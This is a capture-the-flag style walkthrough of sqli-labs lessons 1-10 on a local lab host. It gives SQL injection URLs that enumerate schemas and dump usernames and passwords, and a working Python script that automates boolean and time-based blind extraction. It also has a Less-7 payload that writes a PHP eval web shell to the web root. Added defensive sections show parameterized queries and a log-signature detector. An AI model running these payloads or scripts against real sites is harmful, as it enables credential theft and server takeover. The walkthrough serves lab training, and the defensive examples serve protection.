SQLI-LABS Page1 1-10

Less-1 string-based error injection

A simple error-based injection; detect it with a single quote.
Payloads:

http://192.168.44.139/sqli-labs/Less-1/?id=1' union select 1,2,3,4 --+
Determine the number of columns (the union with 4 columns fails; there are 3).
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1,user(),3 --+
Current user: sqli@localhost
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1,database(),3 --+
Current database: security
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1 , group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
Table names: users,emails,uagents,referers
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1 , group_concat(column_name),3 from information_schema.columns where table_name='users' --+
Column names: id,username,password,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS (the last three belong to another schema's table that is also called users, because this query does not filter on table_schema)
http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1 , group_concat(id),group_concat(username) from users--+
Dump the table contents
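To make the mechanism behind Less-1 concrete, here is an added Python example; it is not code from sqli-labs or from this post. It rebuilds the shape of the lab's lookup (a query of the form SELECT * FROM users WHERE id='<input>' LIMIT 0,1, which is an assumption, since the post never quotes the lab's PHP) over a constructed in-memory SQLite table, and places a parameterized version beside it. The post's own probes are replayed against both: the lone quote that produces the error message the lesson leaks, and the union payload that returns attacker-chosen columns. SQLite is used only so the example runs offline; the concatenation defect and its fix look the same in MySQL/PHP.

```python
import sqlite3

# Constructed stand-in for the lab's users table (sample rows, not the lab's data).
SAMPLE_ROWS = [(1, "alice", "hunter2"), (2, "bob", "letmein"), (3, "carol", "s3cret")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    # The input is spliced into the SQL text between single quotes
    # (assumed query shape for the lab's string-type lessons).
    sql = "SELECT * FROM users WHERE id='{}' LIMIT 0,1".format(user_id)
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    # The driver binds the value; the input never becomes SQL syntax.
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()


def leaks_error(lookup, conn, user_id):
    """True if the lookup raises a database error for this input, i.e. the input
    reached the SQL parser, which is exactly what Less-1's error message reveals."""
    try:
        lookup(conn, user_id)
        return False
    except sqlite3.Error:
        return True


def demo():
    conn = make_db()
    results = {}
    # A normal id behaves the same in both versions.
    results["normal_vuln"] = lookup_vulnerable(conn, "1")
    results["normal_safe"] = lookup_parameterized(conn, "1")
    # The lone-quote probe: syntax error in one, an ordinary empty result in the other.
    results["quote_vuln_errors"] = leaks_error(lookup_vulnerable, conn, "1'")
    results["quote_safe_errors"] = leaks_error(lookup_parameterized, conn, "1'")
    # The union payload from the post; the trailing space is what "--+" decodes to.
    union = "-1' union select 1,2,3 -- "
    results["union_vuln"] = lookup_vulnerable(conn, union)
    results["union_safe"] = lookup_parameterized(conn, union)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The parameterized lookup returns nothing for both probes because the whole string is compared against the id column as a value; there is no parser error to leak and no second SELECT to union in.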

Less-2 numeric error-based injection

Test for injection:
http://192.168.44.139/sqli-labs/Less-2/?id=1 and 1=2

The remaining statements are the same as in Less-1; just drop the single quote after the number.

Less-3

According to the error message there is also a parenthesis after the quote, so the injection becomes 2'); everything else is the same.

Less-4

Inject with 2") (double quotes).

Less-5 string-based blind injection

Determine the length of the database name:
http://192.168.44.139/sqli-labs/Less-5/?id=-1' or (length(database()))>3 --+
Determine the database name (one character at a time):
http://192.168.44.139/sqli-labs/Less-5/?id=-1' or ascii(substr(database(),1,1))>1 --+
...

To automate the injection, here is a small script:

import requests

url = "http://192.168.44.139/sqli-labs/Less-5/?id=-1"
_columns = []
_tables = []
_database = ""


def binarySearch(payload):
    # Narrow down the value of the expression in `payload` by binary search:
    # each request appends ">middle" and the page text shows whether it held.
    maxn = 144
    minn = 1
    while minn <= maxn:
        middle = (maxn + minn) // 2
        payload1 = payload + ">" + str(middle) + "--+"
        # print(payload1)
        r = requests.get(payload1)
        if "You are in" in r.text:   # condition held: the value is larger
            minn = middle + 1
        else:
            maxn = middle - 1
    return minn


def getLength(func):
    # Length of the string the SQL expression `func` evaluates to
    payload1 = url + "' or length({})".format(func)
    return binarySearch(payload1)


def getStr(func, length):
    # Recover the string one character at a time through its ASCII code
    mstr = ""
    for i in range(1, length + 1):
        payload = url + "' or ascii(substr({},{},1))".format(func, i)
        tmp = binarySearch(payload)
        mstr += chr(tmp)
        # print(mstr)
    return mstr


def getDatabase():
    global _database
    func = "database()"
    result = getStr(func, getLength(func))
    print("[*] database: " + result)
    _database = result


def getTableNum(database):
    # Number of tables in the schema (not called from main; kept for reference)
    func = "(select count(table_name) from information_schema.tables where table_schema='{}')".format(database)
    length = getLength(func)
    print(length)
    result = getStr(func, length)
    print("[*] table num = " + result)


def getTables(database):
    global _tables
    func = "(select group_concat(table_name) from information_schema.tables where table_schema='{}')".format(database)
    length = getLength(func)
    result = getStr(func, length)
    _tables = result.split(',')
    print("[*] tables: " + result)


def getColumns(table, database):
    global _columns
    func = "(select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}')".format(table, database)
    length = getLength(func)
    # print(length)
    result = getStr(func, length)
    _columns = result.split(",")
    print("[*] columns from {}: ".format(table) + result)


def getInformation(table, column):
    # Read every column of `table` and print the rows side by side
    Info = {}
    for i in column:
        func = "(select group_concat({}) from {})".format(i, table)
        length = getLength(func)
        # print(length)
        result = getStr(func, length)
        Info[i] = result.split(',')
        # print(result)
        # print(Info[i])
    for i in range(len(Info[column[0]])):
        mstr = ""
        for j in column:
            mstr += Info[j][i]
            mstr += "   "
        print(mstr)


if __name__ == "__main__":
    getDatabase()
    getTables(_database)
    getColumns(_tables[0], _database)
    getInformation(_tables[0], _columns)

Less-6

Change the single quote from Less-5 to a double quote.

Less-7 file write injection

Write a shell; this depends on permissions (the database account needs the file-write privilege and the target directory must be writable by the database server).
http://192.168.44.139/sqli-labs/Less-7/?id=-1')) union select 1,"<?php @eval($_POST['cmd']);?>",3 into outfile '/var/www/html/a.txt' --+
Before writing, you can check @@datadir to learn the server's OS type and then try to guess the absolute path of the web root.

Less-8

Blind injection; the Less-5 script can be used.

Less-9 time-based blind injection

Blind injection. Although the lesson is titled time-based blind injection, a boolean blind injection based on the response length also works; just replace the binarySearch function in the Less-5 script:

import requests

# LEN is the response length for a normal id; when the id does not exist the length changes
LEN = len(requests.get("http://192.168.44.214/sqli-labs/Less-9/?id=1").text)

def binarySearch(payload):
    maxn = 144
    minn = 1
    while minn <= maxn:
        middle = (maxn + minn) // 2
        payload1 = payload + ">" + str(middle) + "--+"
        # print(payload1)
        r = requests.get(payload1)
        # print(len(r.text))
        if len(r.text) == LEN:   # same length as for a valid id: the condition held
            minn = middle + 1
        else:
            maxn = middle - 1
    return minn

For a true time-based blind injection, change the functions as follows:

import re
import requests

def timeout(url):
    # 1 if the request exceeded the timeout (the sleep() branch ran), otherwise 0
    try:
        requests.get(url, timeout=2)
        return 0
    except requests.exceptions.RequestException:
        return 1

def binarySearch(payload):
    maxn = 144
    minn = 1
    while minn <= maxn:
        middle = (maxn + minn) // 2
        payload1 = payload + ">" + str(middle) + "--+"
        # split off the comparison so it can be wrapped in if(..., sleep(), 1)
        tmp = re.split(" or |--", payload1)
        # the sleep duration can be adjusted as needed
        payload2 = tmp[0] + "or" + " if(" + tmp[1] + ",sleep(0.5),1)" + " --+"
        # print(payload2)
        if timeout(payload2):
            minn = middle + 1
        else:
            maxn = middle - 1
    return minn

Less-10

Same injection method as Less-9; just change the delimiter from ' to ".
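Every payload in Less 1-10 leaves a recognisable trace in the web server's access log, and the blind-injection scripts above are especially noisy because each recovered character costs several requests. The following Python is an added example and is not part of this post or of sqli-labs. It parses Apache-style combined log lines (constructed here; the client addresses and timestamps are made up, and the request targets reuse the post's own payload shapes URL-encoded as a client would send them, with the Less-7 file-write reduced to plain columns), decodes each query parameter, matches it against a small signature set covering the union enumeration of Less-1, the ascii/substr/length probes of Less-5 and Less-8, the into outfile of Less-7 and the sleep() of Less-9, and flags any client that sends a burst of blind or time-based probes.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Apache "combined"-style access log line (fields after the size are ignored)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures for the payload shapes used in Less 1-10, applied to decoded parameter values
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b[\s/*+]+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\s*\.", re.I),
    "blind_extract": re.compile(r"\b(?:ascii|substr|substring|length)\s*\(", re.I),
    "time_based": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "file_write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "bool_probe": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "comment_tail": re.compile(r"--\s*$|#\s*$"),
}

# Constructed sample log: two clients, one browsing normally, one running the lab payloads
SAMPLE_LOG = """\
10.0.0.5 - - [03/May/2021:10:00:01 +0000] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 1423
10.0.0.9 - - [03/May/2021:10:00:02 +0000] "GET /sqli-labs/Less-2/?id=1%20and%201=2 HTTP/1.1" 200 1297
10.0.0.9 - - [03/May/2021:10:00:03 +0000] "GET /sqli-labs/Less-1/?id=-1%27%20union%20select%201,database(),3%20--+ HTTP/1.1" 200 1501
10.0.0.9 - - [03/May/2021:10:00:03 +0000] "GET /sqli-labs/Less-1/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20--+ HTTP/1.1" 200 1560
10.0.0.9 - - [03/May/2021:10:00:04 +0000] "GET /sqli-labs/Less-5/?id=-1%27%20or%20ascii(substr(database(),1,1))%3E64%20--+ HTTP/1.1" 200 1360
10.0.0.9 - - [03/May/2021:10:00:04 +0000] "GET /sqli-labs/Less-5/?id=-1%27%20or%20ascii(substr(database(),1,1))%3E96%20--+ HTTP/1.1" 200 1360
10.0.0.9 - - [03/May/2021:10:00:05 +0000] "GET /sqli-labs/Less-5/?id=-1%27%20or%20ascii(substr(database(),1,1))%3E112%20--+ HTTP/1.1" 200 1297
10.0.0.9 - - [03/May/2021:10:00:05 +0000] "GET /sqli-labs/Less-5/?id=-1%27%20or%20ascii(substr(database(),1,1))%3E104%20--+ HTTP/1.1" 200 1360
10.0.0.9 - - [03/May/2021:10:00:07 +0000] "GET /sqli-labs/Less-9/?id=-1%27or%20if(length(database())%3E5,sleep(0.5),1)%20--+ HTTP/1.1" 200 1297
10.0.0.9 - - [03/May/2021:10:00:09 +0000] "GET /sqli-labs/Less-7/?id=-1%27))%20union%20select%201,2,3%20into%20outfile%20%27/tmp/x.txt%27%20--+ HTTP/1.1" 200 1297
10.0.0.5 - - [03/May/2021:10:00:10 +0000] "GET /sqli-labs/Less-2/?id=2 HTTP/1.1" 200 1430
"""


def parse_line(line):
    """Split one log line into its fields plus the decoded query parameters."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    query = urlsplit(rec["target"]).query
    # parse_qs percent-decodes and turns '+' into a space, as the web server does
    rec["params"] = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    return rec


def classify(params):
    """Return the set of signature names matched by any parameter value."""
    hits = set()
    for value in params.values():
        for name, rx in SIGNATURES.items():
            if rx.search(value):
                hits.add(name)
    return hits


def analyze(log_text, burst_threshold=5):
    """Alert per matching request and flag clients sending bursts of blind probes."""
    alerts = []
    blind_counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec["params"])
        if not hits:
            continue
        alerts.append((rec["ip"], urlsplit(rec["target"]).path, sorted(hits)))
        if hits & {"blind_extract", "time_based"}:
            blind_counts[rec["ip"]] += 1
    suspects = sorted(ip for ip, n in blind_counts.items() if n >= burst_threshold)
    return {"alerts": alerts, "blind_counts": dict(blind_counts), "suspects": suspects}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for ip, path, hits in report["alerts"]:
        print(ip, path, ",".join(hits))
    print("burst suspects:", report["suspects"])
```

Decoding before matching matters: the scripts send the payloads percent-encoded, and a rule applied to the raw request line would miss the `'`, `>` and spaces. The burst counter is what catches a binary-search script even if individual signatures are evaded, since a single recovered character still needs around eight requests against the same parameter.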
